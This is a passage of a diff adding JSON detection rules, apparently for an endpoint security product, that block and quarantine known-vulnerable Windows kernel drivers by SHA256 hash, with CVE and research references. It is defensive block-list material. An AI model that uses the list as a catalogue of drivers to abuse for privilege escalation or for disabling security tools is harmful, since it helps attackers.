+ "hl_testing_start_time": "2026-03-23T11:45:31.810018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5cb8102fdd41687f386e57c7728a07810e620e9117d7394d79d5ad753261ffc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21877d01-7486-5db8-ad6c-3f5df81a9099",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458722Z",
+ "creation_date": "2026-03-23T11:45:30.458725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "058c4fbd3a12f0d7ddfc771067f03dea88cc33dd4b61139edcb0b2d17905f084",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "218924ad-8816-5364-b3e5-7a9ba6cde337",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160153Z",
+ "creation_date": "2026-03-23T11:45:31.160155Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62acd95fb57656258a9621b72b5a6697f90e18c9941fc840f993d304522c3f42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "218decdb-7c20-5bc7-9ac4-d8980e603efc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619524Z",
+ "creation_date": "2026-03-23T11:45:29.619526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e7a51de1701057088aac05a8d98a7bb447f8204d193a9f77f449c97b00c850",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "218e03dd-6e9d-556a-8d4e-8ff14e7180bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146970Z",
+ "creation_date": "2026-03-23T11:45:31.146973Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcde2218562066972e7794ca362dfef3ad98a8eb03750e0610cd47c2bed6b74c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "218f2ef1-f0a0-5120-93f2-cc088926a6d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971542Z",
+ "creation_date": "2026-03-23T11:45:29.971544Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1997b7217dfddd8fbd4924e86b58fe585ef4bd91c3069d3deeb34ea70eb82d60",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2192c2b4-4066-5489-9fdb-518c23fa6525",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620763Z",
+ "creation_date": "2026-03-23T11:45:29.620764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620770Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "219b1808-2fe3-5b76-ac3c-568719d4c284",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458848Z",
+ "creation_date": "2026-03-23T11:45:30.458851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa1c07fc6289ddc2182b11e555073e66b7acbfc17c38efb44ecaa19a6aaf722f",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "219d4acc-ee4c-5d64-96f3-d43ac21a4a61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477549Z",
+ "creation_date": "2026-03-23T11:45:30.477552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477561Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b11e109f6b3dbc8aa82cd7da0b7ba93d07d9809ee2a4b21ec014f6a676a53027",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21a5a513-4811-5537-93a8-b2b9322aa250",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458079Z",
+ "creation_date": "2026-03-23T11:45:30.458083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f62911334068c9edd44b9c3e8dee8155a0097aa331dd4566a61afa3549f35f65",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21be4aed-a057-512d-b267-3bfa722e07ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828618Z",
+ "creation_date": "2026-03-23T11:45:31.828620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "285d8e3f07009af95cdeab7bfc91cdbfbae48663582745a5881cfd7d63168ff1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21bfdfd2-d7c0-5b7c-8e5e-efd6a6b8c3d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478542Z",
+ "creation_date": "2026-03-23T11:45:30.478545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2d9f91ede8aed51960ca67318ea337152bb311c03275c0650e4421e6af6b7ee",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21c56f4d-ad5e-51ab-80b2-807c0fe08a0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817905Z",
+ "creation_date": "2026-03-23T11:45:30.817909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2b6350e17e9b24b7140eed743b4ae0b01453bbb8cb73b091b51e2306017d80f",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "21ecad1e-431f-56b5-a336-b69db5a220e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810646Z",
+ "creation_date": "2026-03-23T11:45:31.810648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810653Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d86545c85fa90faa95f5d67723686174f82107dd423feba54907ce0e4297f87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22054282-f6c4-58d4-bd1f-5515b4a07cf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481115Z",
+ "creation_date": "2026-03-23T11:45:30.481117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3a74ac9d23efaa857333a4d8a40ed0026f28575475deeb6eb301fcc0db34efc",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2215df9f-951b-5cb3-8d9f-e394810e80c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145956Z",
+ "creation_date": "2026-03-23T11:45:31.145959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebce1e4dc3b7128e7bfb61ce564b00e2643d3824d3bdf59ffdb3dcdc179aa03c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22199dd4-c945-5622-9ca4-7639c7c97a78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968892Z",
+ "creation_date": "2026-03-23T11:45:29.968894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19d0fc91b70d7a719f7a28b4ad929f114bf1de94a4c7cba5ad821285a4485da0",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2235af9e-6f98-5d24-aa4f-b79e89f8cc0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983832Z",
+ "creation_date": "2026-03-23T11:45:29.983834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47489362609fa9bd398deec955d5600780bb3788eb29a282bcc5245905713eb0",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22411822-4752-52f3-8877-0fd21ba88070",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613242Z",
+ "creation_date": "2026-03-23T11:45:29.613244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "224b83bb-9e02-55c4-8346-343791bd86c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969984Z",
+ "creation_date": "2026-03-23T11:45:29.969986Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47f64d6753f40388382097351a26dad54b8fdf59529a24acc65e9ced440ee2c6",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "224bc865-63ed-5e39-a42a-fb58711c33da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475507Z",
+ "creation_date": "2026-03-23T11:45:31.475511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ab7f3cae3cda68c14847807f120099d150062ba0d3af26e500dce2b099c5ae3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "224ff849-5ac7-59e8-9a76-6e6b46bc4e3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152631Z",
+ "creation_date": "2026-03-23T11:45:31.152633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152639Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b4ff34191eff716061cc36b039bb79db011c7f4a86cb0f1a0e9a5f6bd1b8913",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "225537ae-c682-5d94-9322-54b96efef55e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836047Z",
+ "creation_date": "2026-03-23T11:45:30.836049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54b5c0860d299f087df2aef68ba94dedafda743d320cdb34983a74b7abc6b51e",
